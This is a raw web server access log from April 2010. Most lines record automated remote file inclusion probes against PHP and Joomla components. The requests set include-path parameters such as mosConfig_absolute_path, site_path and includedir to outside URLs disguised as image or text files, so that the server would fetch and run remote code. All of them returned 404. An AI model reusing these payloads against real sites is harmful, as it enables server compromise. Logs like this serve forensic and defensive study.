68.119.215.85 - - [16/Apr/2010:02:38:02 -0400] "GET /logs/access_log.Q110010700%20%20//include/admin.lib.inc.php?site_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:02:38:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
68.119.215.85 - - [16/Apr/2010:02:38:20 -0400] "GET /logs/access_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
68.119.215.85 - - [16/Apr/2010:02:38:26 -0400] "GET /logs/access_log.Q109070300%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:02:38:50 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:02:38:51 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:02:38:51 -0400] "GET /logs/access_log.Q109120400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:02:38:54 -0400] "GET /logs/error_log.Q109120400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:39:00 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:02:39:00 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.111.188.218 - - [16/Apr/2010:02:39:14 -0400] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
212.241.251.224 - - [16/Apr/2010:02:41:41 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:02:41:41 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:02:41:41 -0400] "GET /logs/error_log.Q110021000///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.111.188.218 - - [16/Apr/2010:02:41:45 -0400] "GET /logs/access_log.Q109060400//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
89.111.188.218 - - [16/Apr/2010:02:41:45 -0400] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
89.111.188.218 - - [16/Apr/2010:02:41:46 -0400] "GET /logs//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
